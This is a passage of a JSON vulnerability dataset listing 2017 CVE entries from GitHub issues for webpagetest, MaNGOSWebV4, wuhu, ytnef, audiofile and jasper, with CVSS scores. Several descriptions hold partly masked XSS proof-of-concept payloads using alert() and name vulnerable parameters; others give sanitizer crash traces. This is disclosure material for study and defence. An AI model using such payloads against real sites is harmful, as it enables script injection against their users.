  13307. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cbenchmark\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13308. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13309. "severity": "MEDIUM",
  13310. "baseScore": 6.1,
  13311. "impactScore": 2.7,
  13312. "exploitabilityScore": 2.8
  13313. },
  13314. {
  13315. "CVE_ID": "CVE-2017-6534",
  13316. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/835",
  13317. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/835",
  13318. "Repo_new": "wpo-foundation/webpagetest",
  13319. "Issue_Created_At": "2017-03-04T07:53:23Z",
  13320. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cpssid\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13321. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13322. "severity": "MEDIUM",
  13323. "baseScore": 6.1,
  13324. "impactScore": 2.7,
  13325. "exploitabilityScore": 2.8
  13326. },
  13327. {
  13328. "CVE_ID": "CVE-2017-6535",
  13329. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/832",
  13330. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/832",
  13331. "Repo_new": "wpo-foundation/webpagetest",
  13332. "Issue_Created_At": "2017-03-04T07:52:20Z",
  13333. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13334. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13335. "severity": "MEDIUM",
  13336. "baseScore": 6.1,
  13337. "impactScore": 2.7,
  13338. "exploitabilityScore": 2.8
  13339. },
  13340. {
  13341. "CVE_ID": "CVE-2017-6536",
  13342. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/838",
  13343. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/838",
  13344. "Repo_new": "wpo-foundation/webpagetest",
  13345. "Issue_Created_At": "2017-03-04T07:54:40Z",
  13346. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13347. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13348. "severity": "MEDIUM",
  13349. "baseScore": 6.1,
  13350. "impactScore": 2.7,
  13351. "exploitabilityScore": 2.8
  13352. },
  13353. {
  13354. "CVE_ID": "CVE-2017-6537",
  13355. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/837",
  13356. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/837",
  13357. "Repo_new": "wpo-foundation/webpagetest",
  13358. "Issue_Created_At": "2017-03-04T07:54:05Z",
  13359. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cbgcolor\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG PATHTAG APITAG",
  13360. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13361. "severity": "MEDIUM",
  13362. "baseScore": 6.1,
  13363. "impactScore": 2.7,
  13364. "exploitabilityScore": 2.8
  13365. },
  13366. {
  13367. "CVE_ID": "CVE-2017-6538",
  13368. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/836",
  13369. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/836",
  13370. "Repo_new": "wpo-foundation/webpagetest",
  13371. "Issue_Created_At": "2017-03-04T07:53:43Z",
  13372. "description": "Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cvideo\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13373. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13374. "severity": "MEDIUM",
  13375. "baseScore": 6.1,
  13376. "impactScore": 2.7,
  13377. "exploitabilityScore": 2.8
  13378. },
  13379. {
  13380. "CVE_ID": "CVE-2017-6539",
  13381. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/831",
  13382. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/831",
  13383. "Repo_new": "wpo-foundation/webpagetest",
  13384. "Issue_Created_At": "2017-03-04T07:51:58Z",
  13385. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13386. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13387. "severity": "MEDIUM",
  13388. "baseScore": 6.1,
  13389. "impactScore": 2.7,
  13390. "exploitabilityScore": 2.8
  13391. },
  13392. {
  13393. "CVE_ID": "CVE-2017-6540",
  13394. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/830",
  13395. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/830",
  13396. "Repo_new": "wpo-foundation/webpagetest",
  13397. "Issue_Created_At": "2017-03-04T07:51:28Z",
  13398. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cconfigs\u201d HTTP GET/POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG POST: configs= \";} APITAG APITAG alert NUMBERTAG APITAG APITAG function APITAG TO FILETAG",
  13399. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13400. "severity": "MEDIUM",
  13401. "baseScore": 6.1,
  13402. "impactScore": 2.7,
  13403. "exploitabilityScore": 2.8
  13404. },
  13405. {
  13406. "CVE_ID": "CVE-2017-6541",
  13407. "Issue_Url_old": "https://github.com/WPO-Foundation/webpagetest/issues/834",
  13408. "Issue_Url_new": "https://github.com/wpo-foundation/webpagetest/issues/834",
  13409. "Repo_new": "wpo-foundation/webpagetest",
  13410. "Issue_Created_At": "2017-03-04T07:53:04Z",
  13411. "description": "Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Webpagetest \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: webpagetest Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in\u201cwebpagetest NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in two HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13412. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13413. "severity": "MEDIUM",
  13414. "baseScore": 6.1,
  13415. "impactScore": 2.7,
  13416. "exploitabilityScore": 2.8
  13417. },
  13418. {
  13419. "CVE_ID": "CVE-2017-6544",
  13420. "Issue_Url_old": "https://github.com/Gargaj/wuhu/issues/20",
  13421. "Issue_Url_new": "https://github.com/gargaj/wuhu/issues/20",
  13422. "Repo_new": "gargaj/wuhu",
  13423. "Issue_Created_At": "2017-03-04T05:32:09Z",
  13424. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \u201cid\u201d HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13425. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13426. "severity": "MEDIUM",
  13427. "baseScore": 6.1,
  13428. "impactScore": 2.7,
  13429. "exploitabilityScore": 2.8
  13430. },
  13431. {
  13432. "CVE_ID": "CVE-2017-6800",
  13433. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/28",
  13434. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/28",
  13435. "Repo_new": "yeraze/ytnef",
  13436. "Issue_Created_At": "2017-02-15T15:24:13Z",
  13437. "description": "out of bounds read with test data in APITAG When compiling ytnef with address sanitizer enabled (a compiler feature to detect invalid memory access), it shows an out of bounds read in the function APITAG This doesn't require any malformed input, it happens with many of the test files shipped in the dir test data. To reproduce: Compile ytnef NUMBERTAG with address sanitizer: ./autogen.sh; ./configure; make CFLAGS=\" fsanitize=address g\" Run ytnefprint/ytnefprint test APITAG or ytnefprint/ytnefprint test data/winmail.dat Here's the error message from address sanitizer NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eeb0 at pc NUMBERTAG f NUMBERTAG eb0cc NUMBERTAG a bp NUMBERTAG ffd NUMBERTAG a NUMBERTAG e0 sp NUMBERTAG ffd NUMBERTAG a NUMBERTAG d8 READ of size NUMBERTAG at NUMBERTAG eeb0 thread T NUMBERTAG f NUMBERTAG eb0cc NUMBERTAG in APITAG PATHTAG NUMBERTAG d9bbc in APITAG PATHTAG NUMBERTAG d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ead NUMBERTAG e0 in __libc_start_main APITAG NUMBERTAG d8d NUMBERTAG in _start ( PATHTAG NUMBERTAG eeb4 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG eb3a NUMBERTAG in calloc ( PATHTAG NUMBERTAG f NUMBERTAG eb0c3f2a in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0c NUMBERTAG da in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0cac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG eb0c9ac6 in APITAG PATHTAG NUMBERTAG d NUMBERTAG dc in main PATHTAG NUMBERTAG f NUMBERTAG ead NUMBERTAG e0 in __libc_start_main APITAG",
  13438. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  13439. "severity": "HIGH",
  13440. "baseScore": 7.5,
  13441. "impactScore": 3.6,
  13442. "exploitabilityScore": 3.9
  13443. },
  13444. {
  13445. "CVE_ID": "CVE-2017-6802",
  13446. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/34",
  13447. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/34",
  13448. "Repo_new": "yeraze/ytnef",
  13449. "Issue_Created_At": "2017-02-24T22:46:57Z",
  13450. "description": "out of bounds read in APITAG The attached file causes an out of bounds read detectable with asan in the function APITAG FILETAG Here's the address sanitizer error NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b at pc NUMBERTAG cdc bp NUMBERTAG ffe NUMBERTAG sp NUMBERTAG ffe NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b thread T NUMBERTAG cdb in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG a2cb in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f0b NUMBERTAG c8c1e0 in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG b is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d NUMBERTAG c0 in calloc ( PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG cb NUMBERTAG in APITAG PATHTAG NUMBERTAG f4 in APITAG PATHTAG NUMBERTAG d in main PATHTAG",
  13451. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  13452. "severity": "HIGH",
  13453. "baseScore": 7.5,
  13454. "impactScore": 3.6,
  13455. "exploitabilityScore": 3.9
  13456. },
  13457. {
  13458. "CVE_ID": "CVE-2017-6808",
  13459. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/18",
  13460. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/18",
  13461. "Repo_new": "paintballrefjosh/mangoswebv4",
  13462. "Issue_Created_At": "2017-03-08T04:45:15Z",
  13463. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13464. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13465. "severity": "MEDIUM",
  13466. "baseScore": 6.1,
  13467. "impactScore": 2.7,
  13468. "exploitabilityScore": 2.8
  13469. },
  13470. {
  13471. "CVE_ID": "CVE-2017-6809",
  13472. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/21",
  13473. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/21",
  13474. "Repo_new": "paintballrefjosh/mangoswebv4",
  13475. "Issue_Created_At": "2017-03-08T04:51:58Z",
  13476. "description": "A Reflected XSS vulnerability in admin. FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to PATHTAG FILETAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13477. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13478. "severity": "MEDIUM",
  13479. "baseScore": 6.1,
  13480. "impactScore": 2.7,
  13481. "exploitabilityScore": 2.8
  13482. },
  13483. {
  13484. "CVE_ID": "CVE-2017-6810",
  13485. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/20",
  13486. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/20",
  13487. "Repo_new": "paintballrefjosh/mangoswebv4",
  13488. "Issue_Created_At": "2017-03-08T04:48:55Z",
  13489. "description": "I have find a Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"linkid \" HTTP parameter that will be passed to \" PATHTAG FILETAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13490. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13491. "severity": "MEDIUM",
  13492. "baseScore": 6.1,
  13493. "impactScore": 2.7,
  13494. "exploitabilityScore": 2.8
  13495. },
  13496. {
  13497. "CVE_ID": "CVE-2017-6811",
  13498. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/19",
  13499. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/19",
  13500. "Repo_new": "paintballrefjosh/mangoswebv4",
  13501. "Issue_Created_At": "2017-03-08T04:46:51Z",
  13502. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to \" PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13503. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13504. "severity": "MEDIUM",
  13505. "baseScore": 6.1,
  13506. "impactScore": 2.7,
  13507. "exploitabilityScore": 2.8
  13508. },
  13509. {
  13510. "CVE_ID": "CVE-2017-6812",
  13511. "Issue_Url_old": "https://github.com/paintballrefjosh/MaNGOSWebV4/issues/17",
  13512. "Issue_Url_new": "https://github.com/paintballrefjosh/mangoswebv4/issues/17",
  13513. "Repo_new": "paintballrefjosh/mangoswebv4",
  13514. "Issue_Created_At": "2017-03-08T04:43:45Z",
  13515. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability in FILETAG . The vulnerability exists due to insufficient filtration of user supplied data in \"id\" HTTP parameter that will be passed to \" PATHTAG \". The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13516. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13517. "severity": "MEDIUM",
  13518. "baseScore": 6.1,
  13519. "impactScore": 2.7,
  13520. "exploitabilityScore": 2.8
  13521. },
  13522. {
  13523. "CVE_ID": "CVE-2017-6829",
  13524. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/33",
  13525. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/33",
  13526. "Repo_new": "mpruett/audiofile",
  13527. "Issue_Created_At": "2017-02-20T16:37:33Z",
  13528. "description": "global buffer overflow in APITAG APITAG URLTAG",
  13529. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13530. "severity": "MEDIUM",
  13531. "baseScore": 5.5,
  13532. "impactScore": 3.6,
  13533. "exploitabilityScore": 1.8
  13534. },
  13535. {
  13536. "CVE_ID": "CVE-2017-6830",
  13537. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/34",
  13538. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/34",
  13539. "Repo_new": "mpruett/audiofile",
  13540. "Issue_Created_At": "2017-02-20T16:38:01Z",
  13541. "description": "heap based buffer overflow in alaw2linear_buf APITAG URLTAG",
  13542. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13543. "severity": "MEDIUM",
  13544. "baseScore": 5.5,
  13545. "impactScore": 3.6,
  13546. "exploitabilityScore": 1.8
  13547. },
  13548. {
  13549. "CVE_ID": "CVE-2017-6831",
  13550. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/35",
  13551. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/35",
  13552. "Repo_new": "mpruett/audiofile",
  13553. "Issue_Created_At": "2017-02-20T16:38:25Z",
  13554. "description": "heap based buffer overflow in APITAG APITAG URLTAG",
  13555. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13556. "severity": "MEDIUM",
  13557. "baseScore": 5.5,
  13558. "impactScore": 3.6,
  13559. "exploitabilityScore": 1.8
  13560. },
  13561. {
  13562. "CVE_ID": "CVE-2017-6832",
  13563. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/36",
  13564. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/36",
  13565. "Repo_new": "mpruett/audiofile",
  13566. "Issue_Created_At": "2017-02-20T16:38:50Z",
  13567. "description": "heap based buffer overflow in APITAG APITAG URLTAG",
  13568. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13569. "severity": "MEDIUM",
  13570. "baseScore": 5.5,
  13571. "impactScore": 3.6,
  13572. "exploitabilityScore": 1.8
  13573. },
  13574. {
  13575. "CVE_ID": "CVE-2017-6833",
  13576. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/37",
  13577. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/37",
  13578. "Repo_new": "mpruett/audiofile",
  13579. "Issue_Created_At": "2017-02-20T16:39:16Z",
  13580. "description": "divide by zero in APITAG APITAG URLTAG",
  13581. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13582. "severity": "MEDIUM",
  13583. "baseScore": 5.5,
  13584. "impactScore": 3.6,
  13585. "exploitabilityScore": 1.8
  13586. },
  13587. {
  13588. "CVE_ID": "CVE-2017-6834",
  13589. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/38",
  13590. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/38",
  13591. "Repo_new": "mpruett/audiofile",
  13592. "Issue_Created_At": "2017-02-20T16:39:45Z",
  13593. "description": "heap based buffer overflow in ulaw2linear_buf APITAG URLTAG",
  13594. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13595. "severity": "MEDIUM",
  13596. "baseScore": 5.5,
  13597. "impactScore": 3.6,
  13598. "exploitabilityScore": 1.8
  13599. },
  13600. {
  13601. "CVE_ID": "CVE-2017-6835",
  13602. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/39",
  13603. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/39",
  13604. "Repo_new": "mpruett/audiofile",
  13605. "Issue_Created_At": "2017-02-20T16:40:01Z",
  13606. "description": "divide by zero in APITAG APITAG URLTAG",
  13607. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13608. "severity": "MEDIUM",
  13609. "baseScore": 5.5,
  13610. "impactScore": 3.6,
  13611. "exploitabilityScore": 1.8
  13612. },
  13613. {
  13614. "CVE_ID": "CVE-2017-6836",
  13615. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/40",
  13616. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/40",
  13617. "Repo_new": "mpruett/audiofile",
  13618. "Issue_Created_At": "2017-02-20T16:40:17Z",
  13619. "description": "heap based buffer overflow in APITAG APITAG URLTAG",
  13620. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13621. "severity": "MEDIUM",
  13622. "baseScore": 5.5,
  13623. "impactScore": 3.6,
  13624. "exploitabilityScore": 1.8
  13625. },
  13626. {
  13627. "CVE_ID": "CVE-2017-6837",
  13628. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/41",
  13629. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/41",
  13630. "Repo_new": "mpruett/audiofile",
  13631. "Issue_Created_At": "2017-02-20T16:40:30Z",
  13632. "description": "multiple ubsan crashes. URLTAG",
  13633. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13634. "severity": "MEDIUM",
  13635. "baseScore": 5.5,
  13636. "impactScore": 3.6,
  13637. "exploitabilityScore": 1.8
  13638. },
  13639. {
  13640. "CVE_ID": "CVE-2017-6850",
  13641. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/112",
  13642. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/112",
  13643. "Repo_new": "jasper-software/jasper",
  13644. "Issue_Created_At": "2017-01-18T16:18:54Z",
  13645. "description": "NULL pointer dereference in jp2_cdef_destroy (jp2_cod.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  13646. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13647. "severity": "MEDIUM",
  13648. "baseScore": 5.5,
  13649. "impactScore": 3.6,
  13650. "exploitabilityScore": 1.8
  13651. },
  13652. {
  13653. "CVE_ID": "CVE-2017-6851",
  13654. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/113",
  13655. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/113",
  13656. "Repo_new": "jasper-software/jasper",
  13657. "Issue_Created_At": "2017-01-21T16:36:38Z",
  13658. "description": "invalid memory read in jas_matrix_bindsub (jas_seq.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  13659. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13660. "severity": "MEDIUM",
  13661. "baseScore": 5.5,
  13662. "impactScore": 3.6,
  13663. "exploitabilityScore": 1.8
  13664. },
  13665. {
  13666. "CVE_ID": "CVE-2017-6852",
